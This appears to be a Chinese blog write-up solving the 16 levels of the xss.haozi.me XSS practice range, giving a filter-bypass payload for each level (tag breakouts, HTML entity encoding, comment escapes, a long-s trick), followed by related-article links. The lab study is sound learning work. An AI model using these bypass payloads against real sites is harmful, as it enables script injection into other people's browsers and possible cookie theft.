XSS靶场中级绕过

最新推荐文章于 2023-12-20 17:07:49 发布
最新推荐文章于 2023-12-20 17:07:49 发布
阅读量439 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52714299/article/details/126072986
版权

xss 前端 javascript

XSS靶场中级绕过解析

靶场环境—https://xss.haozi.me/
第一关:
div块是普通元素,直接写入< script >标签即可。

<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>

在这里插入图片描述
第二关:
逃脱< textarea>标签,直接闭合。

</textarea><script>alert(1)</script></textarea>

在这里插入图片描述
第三关:
逃出双引号,闭合input。

a"><script>alert(1)</script>

在这里插入图片描述
第四关:
已经过滤了括号,所以利用mtml实体编码,编译成()。

<img src=1 onerror="alert&#40;1&#41;">

在这里插入图片描述
第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码。

<img src=1 onerror="alert&#40;1&#41;">

在这里插入图片描述
第六关:
转化成笑脸,利用注释符,直接闭合。

--!><script>alert(1)</script><!--

在这里插入图片描述
第七关:
换行,然后进行过滤

type = "image" src=1 onerror
=alert(1)

在这里插入图片描述
第八关:
过滤了反斜杠,尖括号,标签不生效。img标签可以执行,但是不能补全标签,html会丢错。

<img src ="1" onerror="alert(1)"

在这里插入图片描述
第九关:
输出在< style>里面,只能出现文本,不能写js ,闭合< style>也不行。利用换行闭合。

</style
><script>alert(1)</script>

在这里插入图片描述
第十关:
以https://www.segmentfault.com开头,将script标签闭合。

https://www.segmentfault.com"></script><script>alert(1)//

在这里插入图片描述
第十一关:
在这里插入图片描述
还是以https://www.segmentfault.com"开头。利用重定向,新建一个txrt文件,写入alert(1)。

https://www.segmentfault.com@127.0.0.1/txrt.js

第十二关:
将所有字母转化为大写。利用实体编码,将所有字母转换为16进制。

<img src=1 onerror=" &#97;&#108;&#101;&#114;&#116;(1)">

在这里插入图片描述
第十三关:
转换成大写还过滤了script标签。

<img src=1 onerror=" &#97;&#108;&#101;&#114;&#116;(1)">

在这里插入图片描述
第十四关:
注释了所有的内容,还是利用了注释符。


alert(1)
-->

在这里插入图片描述
第十五关:
利用是“s”可以转化为“ſ”。

<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

在这里插入图片描述
第十六关:
将内容转成实体编码,但是可以生效。html认识。

aa');alert(1)//

在这里插入图片描述

当兵回来你可还在
关注
XSS绕过案例演示
CYLK1987310466的博客
08-03 371
XSS
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
最新发布
2401_84297796的博客
04-26 744
作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」: 此文章已录入专栏。
XSS进阶一
giantbranch的专栏
09-04 3320
实验来源:合天网安实验室
xss挖掘思路分享_一些BAT的XSS实例(三)中级
weixin_42362885的博客
01-04 177
前面发表了《一些BAT的XSS实例(一)基础篇》和《一些BAT的XSS实例(二)进阶篇》,主要详细的讲了下1~5题的思路,错过的朋友可以点击上面链接,去查看相应的文章,下面我们来看下后面其他的题。背 景有很多人私信问我,能不能来一些XSS绕过实例分析,我选了些N年前的BAT的XSS实例来聊聊构造和绕过思路。(这些实例都是已经公开并且修补完毕的,这里是只是以此为原型,并做了一定的修改,进行...
DVWA---XSS 存储型 等级演练--亲测可靠0
weixin_44034479的博客
07-07 262
XSS存储型 原理: <持久化> 代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行 低级 步骤 1. 正常测试。输入的内容,会在下方显示出名字和信息内容。 2. 代码分析: 相关函数介绍: trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参数charlist支持添加额外需要删除的字符。
3-10xss绕过思路讲解和案例演示
山兔的博客
04-28 630
XSS绕过-过滤-转换 因为在我们的实际测试过程中,有很多安全系统或多或少,会去做一些安全措施,但是,这些措施,有可能会因为程序员逻辑不够严谨,或者他使用的方法是错的,保证了他的措施起到了一部分作用,但是还是可以被绕过的 0,前端限制绕过,直接抓包重放,或者修改html前端代码 我们的安全措施不要在前端去做,比如输入字符长度限制,这样也引申出一个思想,我们所有的安全措施,永远不要放在前端去做,前端会通过js,会通过属性,起到安全的辅助措施,但是本质上是没有作用的 1.大小写,比如:<SCRIPT&g
DVWA靶场xss通关笔记,详解带截图
AboutLzs的博客
03-21 1444
DVWA靶场Xss通关笔记
DVWA下的XSS漏洞通关练习
weixin_48609562的博客
06-15 664
XSS 介绍 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用document.boby.innerHtml
DVWA系列(四)——使用Burpsuite进行存储型XSS(存储型跨站脚本攻击)
橘子女侠
05-05 2657
存储型XSS 长期存储于服务器端; 每次用户访问都会执行脚本代码; 1. 存储型XSS攻击图示 (1)获取被攻击者的cookie; 黑客首先向服务器发送js脚本; 服务器返回含有js脚本的页面;并将该页面存储在服务器上; 当被攻击方访问服务器时,服务器返回存储的js页面; 黑客接收到被攻击方的cookie; (2) 重定向到第三方网站; 黑客首先...
DVWA(三)反射型XSSXSS(Reflected))
qq_42180996的博客
07-25 2515
反射型XSS 一、实验环境 二、实验原理 1.概念 2.xss漏洞类型 3.原理 4.原理图解 三、实验步骤 (一)Low级别 1.源码 2.正确输入 3.直接嵌入 4.元素事件之加载即弹窗 5.元素事件之登入超链接 6.元素事件之查找超链接图片 7.元素事件之点击即弹窗 8.重定向至百度 9.重定向至超链接 10.重定向至超链接图片 11.获取cook...
"><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
05-30 3730
">
xss(跨站攻击)
m0_74456293的博客
03-20 2718
xss(跨站攻击)
XSS姿势——文件上传XSS
haha1314的博客
04-22 3963
XSS姿势——文件上传XSS 文件上传xss,一般都是上传html文件导致存储或者反射xss,一般文件内容都是html。 1、把以下代码写入文件,后缀改成图片格式。 <html> <body> <img src=1 onerror=alert(1)> </body> </html> 2、或者将后缀名改为htm...
img src=“x“ onerror=“alert(1)“>
Buoluochuixue的博客
12-20 1162
read函数的数据传输过程是怎样的?公司是迈瑞医疗,岗位是自动化开发,学历是硕士985,地点是武汉,校招薪资是(22+0.5+0.616)*14,应该是这个岗位的顶峰了。985非科班硕,今天接到了保温电话,hr问期望薪资,因为我手上只有3个总包20w左右的国企offer,卑微地跟hr说期望薪资25w以上,达不到的话23w以上也行。985非科班硕,今天接到了保温电话,hr问期望薪资,因为我手上只有3个总包20w左右的国企offer,卑微地跟hr说期望薪资25w以上,达不到的话23w以上也行。
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 3297
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
XSS从菜鸟到高手,你可能需要这些干货&技巧
MachineGunJoe666
06-03 2451
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
XSS表情包靶场通关记录
m0_63134119的博客
12-04 2533
平台 alert(1)https://xss.haozi.me 0X00 源码无防护,直接常规payload绕过 <script>alert(1)</script> <svgonlad=alert(1)> 0x01 可以看到注入点是在<textarea></textarea>标签中,想要成功注入的话,就需要我们主动去构造标签,通过闭合<textarea></textarea>,即可注入成功。 .
"><img src=1 onerror=alert(document.cookie)>
fansun的专栏
07-01 1092
a
"><img src=xss onerror=alert(test)>
u013851193的专栏
08-02 2100
">
XSS攻击绕过技巧详解
本文主要介绍了七种XSS跨站脚本攻击的绕过方法,包括服务端全局替换、大小写绕过、进制代替、自动闭合、伪协议、编码绕过以及规定资源利用。 1. 服务端全局替换为空的特性 当服务器端的过滤规则将某些字符替换为空...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值